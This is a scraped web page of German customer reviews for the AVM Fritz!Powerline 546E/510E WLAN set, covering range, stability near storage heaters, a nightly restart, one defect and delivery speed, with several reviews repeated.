    1. Habe damit unser ganzes haus vernetzt. Einzigste schwachstelle es funktioniert nur bedingt bei nachtspeicherheizung, wenn die schütze in die nacht / ladestellung gehen kommt es hin und wieder zu ausfällen.
  11. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Funktioniert einwanfrei es ist eine kauf empfehlung wenn man weit von router entfernt ist. Das geräte macht einen restart um 4 uhr nachts.
    1. Funktioniert einwanfrei es ist eine kauf empfehlung wenn man weit von router entfernt ist. Das geräte macht einen restart um 4 uhr nachts.
      1. . Als das gerät funktionierte, erfüllte es genau meine anforderungen und ich war sehr zufrieden. Nun ist es leider defekt, nach ca. Ein schelm wer böses dabei denkt. Ich werde mit trotzdem ein neues gerät von avm kaufen, da ich mit diesen geräten bisher nur gute erfahrungen gemacht habe. Ich hoffe mal, dass es sich bei diesem defekt um eine ausnahme handelt.
  12. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    . Als das gerät funktionierte, erfüllte es genau meine anforderungen und ich war sehr zufrieden. Nun ist es leider defekt, nach ca. Ein schelm wer böses dabei denkt. Ich werde mit trotzdem ein neues gerät von avm kaufen, da ich mit diesen geräten bisher nur gute erfahrungen gemacht habe. Ich hoffe mal, dass es sich bei diesem defekt um eine ausnahme handelt.
  13. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Der preis war okay und die lieferung schnell. Keine unnötige zeit damit verloren. Da wir in einer großstadt leben, hätte ich langeeinen parkplatz suchen müssen und außerdem übberteuere parkgebühren zahlen. Damit habe ich weniger streß und mein geldbeutel gespart.
  14. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Der preis war okay und die lieferung schnell. Keine unnötige zeit damit verloren. Da wir in einer großstadt leben, hätte ich langeeinen parkplatz suchen müssen und außerdem übberteuere parkgebühren zahlen. Damit habe ich weniger streß und mein geldbeutel gespart.
  15. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Funktioniert genau nach meinen vorstellungen. Besser wie ein normaler repeater. Schnelle einstellung und super empfang. Werde noch mehr davon kaufen.
    1. Funktioniert genau nach meinen vorstellungen. Besser wie ein normaler repeater. Schnelle einstellung und super empfang. Werde noch mehr davon kaufen.

Comments are closed.